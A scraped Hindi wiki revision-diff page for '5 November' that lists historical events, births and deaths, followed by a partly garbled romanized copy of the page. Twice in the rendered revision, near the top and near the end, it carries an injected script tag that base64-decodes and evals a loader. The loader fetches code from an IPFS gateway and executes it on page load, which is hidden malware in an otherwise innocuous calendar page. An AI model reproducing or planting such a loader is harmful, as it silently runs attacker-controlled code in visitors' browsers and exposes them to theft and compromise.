Difference between revisions of "5 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(11 intermediate revisions by 6 users not shown)
Line 4: Line 4:
  
 
==5 नवंबर की महत्त्वपूर्ण घटनाएँ==
 
==5 नवंबर की महत्त्वपूर्ण घटनाएँ==
 +
* 1556 - [[पानीपत का दूसरा युद्ध|पानीपत के दूसरे युद्ध]] में [[मुग़ल]] शासक [[अकबर]] ने [[हेमू]] को हराया।
 +
* 1630 - [[स्पेन]] और [[इंग्लैंड]] के बीच शांति समझौते पर हस्ताक्षर।
 +
* 1639 - मैसाच्युसेट्स में पहले [[डाकघर]] की स्थापना।
 +
* 1678 - [[जर्मनी]] की विशेष सेना ब्रैंडनबर्गर्स ने स्वीडन में ग्रीफ्सवाल्ड शहर पर क़ब्ज़ा जमाया।
 +
* 1725 - स्पेन और आस्ट्रिया ने गुप्त समझौते पर हस्ताक्षर किये।
 +
* 1811 - स्पेन के खिलाफ मध्य अमेरिकी देश अल सल्वाडोर का प्रथम स्वतंत्रता संघर्ष।
 +
* 1854 - क्रीमिया के युद्ध में ब्रिटिश और [[फ्रांस]] की संयुक्त सेना ने इकेरमान में रूसी सेना को पराजित किया।
 +
* [[1872]] - उल्येसेस एस ग्रांट [[अमेरिका]] के दूसरी बार राष्ट्रपति निर्वाचित।
 
* [[1914]] - [[इंग्लैंड]] एवं [[फ्रांस]] द्वारा तुर्की के विरुद्ध युद्ध की घोषणा।  
 
* [[1914]] - [[इंग्लैंड]] एवं [[फ्रांस]] द्वारा तुर्की के विरुद्ध युद्ध की घोषणा।  
 +
* [[1920]] - 'इंडियन रेडक्राॅस सोसाइटी' की स्थापना।
 +
* [[1930]] - [[अमेरिका]] के महान् [[साहित्यकार]] सिन्क्लेयर लेविस को उनकी कृति ‘बाबित्त’ के लिये [[साहित्य]] का [[नोबल पुरस्कार]] मिला।
 +
* [[1951]] - नावेदा परमाणु परीक्षण केंद्र में अमेरिका ने परमाणु परीक्षण किया।
 +
* [[1961]] - [[भारत]] के प्रथम [[प्रधानमंत्री]] [[जवाहरलाल नेहरू]] ने न्यूयार्क की यात्रा की।
 +
* [[1976]] - सोवियत संघ ने परमाणु परीक्षण किया।
 
* [[1985]] - 24 वर्ष तक शासन करने के बाद तंजानिया के राष्ट्रपति जूलियस न्येरेरे द्वारा पदत्याग।  
 
* [[1985]] - 24 वर्ष तक शासन करने के बाद तंजानिया के राष्ट्रपति जूलियस न्येरेरे द्वारा पदत्याग।  
 
* [[1995]] - इस्रायल के प्रधानमंत्री यित्जाक रॉबिन की गोली मारकर नृशंस हत्या।  
 
* [[1995]] - इस्रायल के प्रधानमंत्री यित्जाक रॉबिन की गोली मारकर नृशंस हत्या।  
 
* [[1999]] - वेस्टइंडीज के महानतम तेज गेंदबाज़ मैल्कम मार्शल का निधन।  
 
* [[1999]] - वेस्टइंडीज के महानतम तेज गेंदबाज़ मैल्कम मार्शल का निधन।  
* [[2001]] - [[भारत]] तथा [[रूस]] ने अफ़ग़ान सरकार में तालिबान की भागीदारी नामंजूर की।  
+
* [[2001]] - [[भारत]] तथा [[रूस]] ने [[अफ़ग़ान]] सरकार में तालिबान की भागीदारी नामंजूर की।  
* [[2002]] - ईरान के सर्वोच्च नेता अयातुल्ला खुमैनी ने जेल में बंद देश के शीर्ष असंतुष्ट नेता अब्दुल्ला नूरी को आम माफी दी।  
+
* [[2002]] - [[ईरान]] के सर्वोच्च नेता अयातुल्ला खुमैनी ने जेल में बंद देश के शीर्ष असंतुष्ट नेता अब्दुल्ला नूरी को आम माफी दी।  
 
* [[2004]] - गाजा पट्टी और पश्चिमी तट की चार बस्तियों को ख़ाली करने संबंधी प्रधानमंत्री एरियल शैरोन की योजना को इस्रायली संसद ने मंजूरी दी।  
 
* [[2004]] - गाजा पट्टी और पश्चिमी तट की चार बस्तियों को ख़ाली करने संबंधी प्रधानमंत्री एरियल शैरोन की योजना को इस्रायली संसद ने मंजूरी दी।  
* [[2006]] - इराक के उच्चाधिकार न्यायाधिकरण ने देश के अपदस्थ राष्ट्रपति सद्दाम हुसैन को मानवता के ख़िलाफ़ अपराध का दोषी पाते हुए फांसी की सज़ा सुनाई।  
+
* [[2006]] - इराक के उच्चाधिकार न्यायाधिकरण ने देश के अपदस्थ राष्ट्रपति सद्दाम हुसैन को मानवता के ख़िलाफ़ अपराध का दोषी पाते हुए फाँसी की सज़ा सुनाई।  
 +
* [[2007]] - [[चीन]] का पहला अंतरिक्ष यान चेंज-1 चंद्रमा की कक्षा में पहुंचा।
 +
* [[2012]] - सीरिया में आत्मघाती बम विस्फाेट में 50 सैनिक मरे।
 +
* [[2013]]- [[भारत]] ने अपने पहले मंगल ग्रह परिक्रमा अभियान (एमओएम) के लिए ध्रुवीय रॉकेट को 5 नवम्बर, [[2013]] को [[सतीश धवन अंतरिक्ष केंद्र]] से सफलतापूर्वक प्रक्षेपित करके [[इतिहास]] रच दिया।
 +
 
 
==5 नवंबर को जन्मे व्यक्ति==
 
==5 नवंबर को जन्मे व्यक्ति==
* [[1870]] - [[चित्तरंजन दास]] - महान स्वतंत्रता सेनानी।
+
* [[1870]] - [[चित्तरंजन दास]] - महान् स्वतंत्रता सेनानी।
 +
* [[1917]] - [[बनारसी दास गुप्ता]] - [[हरियाणा]] के भूतपूर्व [[मुख्यमंत्री]] तथा स्वतंत्रता सेनानी।
 +
* [[1921]] - [[उदयराज सिंह]] - [[हिन्दी]] के प्रसिद्ध साहित्यकार।
 +
* [[1930]] - [[अर्जुन सिंह]] - [[भारतीय राष्ट्रीय कांग्रेस]] के वरिष्ठ राजनीतिज्ञों में से एक थे।
 +
* [[1938]] - [[सुहास पांडुरंग सुखात्मे]] - भारतीय वैज्ञानिक, शिक्षक, लेखक और भारत सरकार के परमाणु ऊर्जा नियामक बोर्ड के पूर्व अध्यक्ष रहे हैं।
 +
 
 
==5 नवंबर को हुए निधन==
 
==5 नवंबर को हुए निधन==
 +
* [[2022]] - [[श्याम सरन नेगी]] - [[हिमाचल प्रदेश]] के एक शिक्षक थे जो देश के पहले मतदाता के रूप में जाने जाते थे।
 +
* [[2013]] - [[परमानन्द श्रीवास्तव]] - [[हिन्दी]] के शीर्ष आलोचकों में गिने जाने वाले प्रतिष्ठित [[साहित्यकार]] थे।
 
* [[1915]] - [[फ़िरोजशाह मेहता]] - भारतीय राजनेता तथा बंबई नगरपालिका के संविधान (चार्टर) के निर्माता।
 
* [[1915]] - [[फ़िरोजशाह मेहता]] - भारतीय राजनेता तथा बंबई नगरपालिका के संविधान (चार्टर) के निर्माता।
 
* [[1950]] - [[फ़ैयाज़ ख़ाँ]] - [[ध्रुपद]] तथा [[ख़याल]] गायन शैली के श्रेष्ठतम गायक
 
* [[1950]] - [[फ़ैयाज़ ख़ाँ]] - [[ध्रुपद]] तथा [[ख़याल]] गायन शैली के श्रेष्ठतम गायक
Line 25: Line 49:
 
* अंतर्राष्ट्रीय रेड क्रास दिवस (सप्ताह)
 
* अंतर्राष्ट्रीय रेड क्रास दिवस (सप्ताह)
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-day-05-november/today-in-history/news/675343.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 08:52, 5 November 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 5 navanbar varsh ka 309 vaan (lip varsh mean yah 310 vaan) din hai. sal mean abhi aur 56 din shesh haian.

5 navanbar ki mahattvapoorn ghatanaean

  • 1556 - panipat ke doosare yuddh mean mugal shasak akabar ne hemoo ko haraya.
  • 1630 - spen aur ianglaiand ke bich shaanti samajhaute par hastakshar.
  • 1639 - maisachyusets mean pahale dakaghar ki sthapana.
  • 1678 - jarmani ki vishesh sena braiandanabargars ne svidan mean griphsavald shahar par qabza jamaya.
  • 1725 - spen aur astriya ne gupt samajhaute par hastakshar kiye.
  • 1811 - spen ke khilaph madhy ameriki desh al salvador ka pratham svatantrata sangharsh.
  • 1854 - krimiya ke yuddh mean british aur phraans ki sanyukt sena ne ikeraman mean roosi sena ko parajit kiya.
  • 1872 - ulyeses es graant amerika ke doosari bar rashtrapati nirvachit.
  • 1914 - ianglaiand evan phraans dvara turki ke viruddh yuddh ki ghoshana.
  • 1920 - 'iandiyan redakraॅs sosaiti' ki sthapana.
  • 1930 - amerika ke mahanh sahityakar sinkleyar levis ko unaki kriti ‘babitt’ ke liye sahity ka nobal puraskar mila.
  • 1951 - naveda paramanu parikshan keandr mean amerika ne paramanu parikshan kiya.
  • 1961 - bharat ke pratham pradhanamantri javaharalal neharoo ne nyooyark ki yatra ki.
  • 1976 - soviyat sangh ne paramanu parikshan kiya.
  • 1985 - 24 varsh tak shasan karane ke bad tanjaniya ke rashtrapati jooliyas nyerere dvara padatyag.
  • 1995 - israyal ke pradhanamantri yitjak r aaubin ki goli marakar nrishans hatya.
  • 1999 - vestiandij ke mahanatam tej geandabaz mailkam marshal ka nidhan.
  • 2001 - bharat tatha roos ne afagan sarakar mean taliban ki bhagidari namanjoor ki.
  • 2002 - eeran ke sarvochch neta ayatulla khumaini ne jel mean band desh ke shirsh asantusht neta abdulla noori ko am maphi di.
  • 2004 - gaja patti aur pashchimi tat ki char bastiyoan ko khali karane sanbandhi pradhanamantri eriyal shairon ki yojana ko israyali sansad ne manjoori di.
  • 2006 - irak ke uchchadhikar nyayadhikaran ne desh ke apadasth rashtrapati saddam husain ko manavata ke khilaf aparadh ka doshi pate hue phaansi ki saza sunaee.
  • 2007 - chin ka pahala aantariksh yan cheanj-1 chandrama ki kaksha mean pahuancha.
  • 2012 - siriya mean atmaghati bam visphaet mean 50 sainik mare.
  • 2013- bharat ne apane pahale mangal grah parikrama abhiyan (emoem) ke lie dhruviy r aauket ko 5 navambar, 2013 ko satish dhavan aantariksh keandr se saphalatapoorvak prakshepit karake itihas rach diya.

5 navanbar ko janme vyakti

5 navanbar ko hue nidhan

5 navanbar ke mahattvapoorn avasar evan utsav

  • aantarrashtriy red kras divas (saptah)

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh